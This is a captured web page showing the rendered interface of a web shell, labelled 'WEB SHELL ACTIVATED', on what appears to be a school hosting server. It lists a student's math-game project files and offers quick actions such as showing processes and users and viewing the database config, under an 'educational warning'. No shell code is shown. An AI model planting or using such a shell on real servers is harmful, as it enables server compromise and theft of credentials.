🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/584683.klas4s23.mid-ica.nl/public_html/l7-pro-1-rekenrace-2023-PunkySpunk15/Rekenrace

📁 ..
📁 .vs
📄 App.xaml [view]
📄 App.xaml.cs [view]
📄 AssemblyInfo.cs [view]
📄 ChooseDifficultyWindow.xaml [view]
📄 ChooseDifficultyWindow.xaml.cs [view]
📄 HighscoreWindow.xaml [view]
📄 HighscoreWindow.xaml.cs [view]
📄 LoginWindow.xaml [view]
📄 LoginWindow.xaml.cs [view]
📄 Rekenrace.csproj [view]
📄 Rekenrace.sln [view]
📄 ScoreWindow.xaml [view]
📄 ScoreWindow.xaml.cs [view]
📄 Sum.cs [view]
📄 SumGenerator.cs [view]
📄 SumWindow.xaml [view]
📄 SumWindow.xaml.cs [view]
📄 Top10Window.xaml [view]
📄 Top10Window.xaml.cs [view]
📄 User.cs [view]
📁 assets
📁 bin
📁 obj
📄 rekenraceData.json [view]

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!